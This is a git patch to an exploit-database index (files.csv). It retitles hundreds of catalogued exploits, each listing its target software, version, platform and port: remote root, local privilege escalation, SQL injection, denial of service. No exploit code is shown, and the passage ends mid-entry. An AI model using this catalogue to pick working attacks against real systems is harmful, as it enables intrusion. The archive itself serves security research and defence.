From 82307c8cbc9936ed6e08f841a7ea082d34819a20 Mon Sep 17 00:00:00 2001 From: root Date: Tue, 9 Jun 2015 06:38:42 +0000 Subject: [PATCH] DB: 2015-06-09 4 new exploits --- files.csv | 1520 +++++++++++++------------- platforms/hardware/webapps/37237.txt | 31 + platforms/hardware/webapps/37238.txt | 31 + platforms/hardware/webapps/37240.txt | 39 + platforms/hardware/webapps/37241.txt | 31 + platforms/linux/local/40.pl | 6 +- platforms/linux/remote/38.pl | 6 +- platforms/windows/dos/3030.html | 100 +- platforms/windows/dos/3041.html | 46 +- platforms/windows/dos/3042.html | 46 +- platforms/windows/dos/3155.html | 50 +- platforms/windows/dos/3421.html | 124 +-- platforms/windows/remote/3993.html | 102 +- platforms/windows/remote/4023.html | 48 +- 14 files changed, 1158 insertions(+), 1022 deletions(-) create mode 100755 platforms/hardware/webapps/37237.txt create mode 100755 platforms/hardware/webapps/37238.txt create mode 100755 platforms/hardware/webapps/37240.txt create mode 100755 platforms/hardware/webapps/37241.txt diff --git a/files.csv b/files.csv index 5fb98523c..f1e49ae42 100755 --- a/files.csv +++ b/files.csv @@ -4,12 +4,12 @@ id,file,description,date,author,platform,type,port 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0 5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 -6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 +6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 - (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 -37060,platforms/windows/dos/37060.html,"Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0 +37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 @@ -34,11 +34,11 @@ id,file,description,date,author,platform,type,port 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 -36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (new)",2003-06-01,alumni,windows,remote,80 +36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 -38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl",2003-06-08,"Matthew Murphy",linux,remote,80 +38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - Remote Root Exploit (atftpdx.c)",2003-06-10,gunzip,linux,remote,69 -40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit (d86mail.pl)",2003-06-10,N/A,linux,local,0 +40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,N/A,linux,local,0 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25 43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21 @@ -48,7 +48,7 @@ id,file,description,date,author,platform,type,port 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - Remote php File Include Exploit",2003-06-30,Spoofed,php,webapps,0 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 -50,platforms/windows/remote/50.pl,"ColdFusion MX Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 +50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI Remote Exploit for whereami.cgi (ccbillx.c)",2003-07-10,knight420,cgi,webapps,0 @@ -107,7 +107,7 @@ id,file,description,date,author,platform,type,port 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 -112,platforms/windows/remote/112.c,"mIRC 6.1 - ""IRC"" Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 +112,platforms/windows/remote/112.c,"mIRC 6.1 - _IRC_ Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - Remote Denial of Service Exploit (wuftpd-freezer.c)",2003-10-31,"Angelo Rosiello",linux,dos,0 @@ -123,7 +123,7 @@ id,file,description,date,author,platform,type,port 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 -129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - ""do_brk()"" Local Root Exploit (PoC)",2003-12-02,"Christophe Devine",linux,local,0 +129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - _do_brk()_ Local Root Exploit (PoC)",2003-12-02,"Christophe Devine",linux,local,0 130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - (do_brk) Local Root Exploit (working)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 @@ -134,26 +134,26 @@ id,file,description,date,author,platform,type,port 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-NUKE <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 -140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 -141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0 -142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0 +140,platforms/linux/local/140.c,"Xsok 1.02 - _-xsokdir_ Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 +141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - _do_mremap_ Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0 +142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - _do_mremap_ Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - mremap() Bound Checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 -149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21 +149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x _SITE CHMOD_ Command Remote Exploit",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 -154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 +154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 -160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Missing ""do_munmap"" Exploit",2004-03-01,"Paul Starzetz",linux,local,0 +160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Missing _do_munmap_ Exploit",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,N/A,windows,remote,0 164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 @@ -367,7 +367,7 @@ id,file,description,date,author,platform,type,port 392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl",2004-08-13,pi3,linux,local,0 -395,platforms/windows/local/395.c,"AOL Instant Messenger AIM ""Away"" Message Local Exploit",2004-08-14,mandragore,windows,local,0 +395,platforms/windows/local/395.c,"AOL Instant Messenger AIM _Away_ Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync <= 2.5.1 - Remote Exploit",2002-01-01,Teso,linux,remote,873 @@ -398,7 +398,7 @@ id,file,description,date,author,platform,type,port 428,platforms/windows/dos/428.c,"CesarFTP Server Long Command Denial of Service Exploit",2004-08-31,lion,windows,dos,0 429,platforms/windows/dos/429.c,"Ground Control <= 1.0.0.7 (Server/Client) Denial of Service Exploit",2004-08-31,"Luigi Auriemma",windows,dos,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 SQL Injection Exploit",2004-09-01,aCiDBiTS,php,webapps,0 -431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM ""Away"" Message Remote Exploit",2004-09-02,"John Bissell",windows,remote,0 +431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM _Away_ Message Remote Exploit",2004-09-02,"John Bissell",windows,remote,0 432,platforms/bsd/remote/432.c,"Courier-IMAP <= 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 433,platforms/multiple/dos/433.c,"Call of Duty <= 1.4 - Denial of Service Exploit",2004-09-05,"Luigi Auriemma",multiple,dos,0 434,platforms/linux/local/434.sh,"CDRDAO Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 @@ -435,7 +435,7 @@ id,file,description,date,author,platform,type,port 565,platforms/php/webapps/565.txt,"Silent Storm Portal Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow Exploit",2004-10-04,LoWNOISE,windows,remote,80 568,platforms/windows/remote/568.c,"Icecast <= 2.0.1 Win32 - Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 -570,platforms/php/webapps/570.txt,"WordPress Blog HTTP Splitting Vulnerability",2004-10-10,"Tenable NS",php,webapps,0 +570,platforms/php/webapps/570.txt,"WordPress Blog - HTTP Splitting Vulnerability",2004-10-10,"Tenable NS",php,webapps,0 571,platforms/windows/dos/571.c,"Monolith Games Local Buffer Overflow Exploit",2004-10-10,"Luigi Auriemma",windows,dos,0 572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 573,platforms/windows/remote/573.c,"Icecast <= 2.0.1 Win32 - Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 @@ -507,7 +507,7 @@ id,file,description,date,author,platform,type,port 655,platforms/windows/dos/655.c,"Star Wars Battlefront <= 1.1 Fake Players Denial of Service Exploit",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 -659,platforms/cgi/webapps/659.txt,"EZshopper- Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 +659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 @@ -560,7 +560,7 @@ id,file,description,date,author,platform,type,port 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,N/A,php,webapps,0 721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash Vulnerability",2004-12-25,Flashsky,windows,dos,0 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,N/A,php,webapps,0 -726,platforms/windows/remote/726.c,"Netcat 1.1 - ""-e"" Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0 +726,platforms/windows/remote/726.c,"Netcat 1.1 - _-e_ Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0 729,platforms/windows/remote/729.txt,"PHP <= 4.3.7 openlog() Buffer Overflow Exploit",2004-12-28,"The Warlock [BhQ]",windows,remote,80 730,platforms/windows/remote/730.html,"Microsoft Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0 733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 @@ -580,7 +580,7 @@ id,file,description,date,author,platform,type,port 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version)",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"Microsoft Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0 -755,platforms/windows/dos/755.c,"Breed <= patch #1 zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 +755,platforms/windows/dos/755.c,"Breed <= patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 756,platforms/linux/local/756.c,"Exim <= 4.41 dns_build_reverse Local Exploit PoC",2005-01-15,"Rafael Carrasco",linux,local,0 758,platforms/osx/remote/758.c,"Apple iTunes Playlist Local Parsing Buffer Overflow Exploit",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit",2005-01-16,ATmaCA,windows,remote,0 @@ -638,17 +638,17 @@ id,file,description,date,author,platform,type,port 813,platforms/windows/dos/813.c,"Quake 3 Engine Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 814,platforms/php/webapps/814.txt,"MercuryBoard <= 1.1.1 Working SQL Injection",2005-02-12,Zeelock,php,webapps,0 815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 -816,platforms/linux/local/816.c,"GNU a2ps ""Anything to PostScript"" Local Exploit (not suid)",2005-02-13,lizard,linux,local,0 +816,platforms/linux/local/816.c,"GNU a2ps _Anything to PostScript_ Local Exploit (not suid)",2005-02-13,lizard,linux,local,0 817,platforms/cgi/webapps/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,webapps,0 -818,platforms/php/webapps/818.txt,"vBulletin <= 3.0.4 - ""forumdisplay.php"" Code Execution",2005-02-14,AL3NDALEEB,php,webapps,0 +818,platforms/php/webapps/818.txt,"vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution",2005-02-14,AL3NDALEEB,php,webapps,0 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80 -820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - ""forumdisplay.php"" Code Execution (part 2)",2005-02-15,AL3NDALEEB,php,webapps,0 -822,platforms/windows/remote/822.c,"Serv-U 4.x ""site chmod"" Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 +820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution (part 2)",2005-02-15,AL3NDALEEB,php,webapps,0 +822,platforms/windows/remote/822.c,"Serv-U 4.x _site chmod_ Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"Dream FTP 1.2 - Remote Format String Exploit",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com Ftp Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 -827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP Unauthorized ""USER"" Remote BoF Exploit",2005-02-18,class101,windows,remote,21 +827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP Unauthorized _USER_ Remote BoF Exploit",2005-02-18,class101,windows,remote,21 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 File Request Format String Remote Exploit (win)",2005-02-19,mandragore,windows,remote,8000 @@ -662,7 +662,7 @@ id,file,description,date,author,platform,type,port 838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 - 6.5 - Directory Traversal and Denial of Service Exploit",2005-02-24,karak0rsan,multiple,dos,0 839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 - 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 -841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 - ""cl_guid"" - Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 +841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 - _cl_guid_ - Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0 843,platforms/windows/dos/843.c,"Knet <= 1.04c Buffer Overflow Denial of Service Exploit",2005-02-25,CorryL,windows,dos,0 844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0 @@ -687,17 +687,17 @@ id,file,description,date,author,platform,type,port 865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 867,platforms/multiple/dos/867.c,"Ethereal <= 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 -868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer ""mshtml.dll"" CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 +868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer _mshtml.dll_ CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Exploit",2005-03-09,RusH,bsd,dos,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) <= 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users Vuln",2005-03-11,Ali7,php,webapps,0 -874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 - ""3G-A11"" - Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0 +874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 - _3G-A11_ - Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093 876,platforms/linux/local/876.c,"PaX Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow Exploit",2005-03-14,"Kevin Finisterre",linux,local,0 -878,platforms/linux/remote/878.c,"Ethereal <= 0.10.9 - ""3G-A11"" Remote Buffer Overflow Exploit",2005-03-14,"Diego Giagio",linux,remote,0 +878,platforms/linux/remote/878.c,"Ethereal <= 0.10.9 - _3G-A11_ Remote Buffer Overflow Exploit",2005-03-14,"Diego Giagio",linux,remote,0 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel <= 2.5 - Remote SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0 @@ -793,7 +793,7 @@ id,file,description,date,author,platform,type,port 974,platforms/linux/local/974.pl,"ARPUS/Ce Local Overflow Exploit (setuid) (perl)",2005-05-01,"Kevin Finisterre",linux,local,0 975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow Exploit",2005-05-01,muts,windows,remote,21 976,platforms/windows/remote/976.cpp,"Microsoft Windows WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0 -977,platforms/hp-ux/remote/977.c,"HP-UX FTPD <= 1.1.214.4 - ""REST"" Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 +977,platforms/hp-ux/remote/977.c,"HP-UX FTPD <= 1.1.214.4 - _REST_ Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 978,platforms/windows/dos/978.cpp,"Ashley's Web Server Denial of Service Exploit",2005-05-04,basher13,windows,dos,0 979,platforms/windows/remote/979.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit",2005-05-04,Mouse,windows,remote,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce (i-mall.cgi) Remote Command Execution Exploit",2005-05-04,"Jerome Athias",cgi,webapps,0 @@ -834,14 +834,14 @@ id,file,description,date,author,platform,type,port 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 1023,platforms/php/webapps/1023.pl,"myBloggie 2.1.1 - 2.1.2 - SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 -1025,platforms/windows/dos/1025.html,"Microsoft Internet 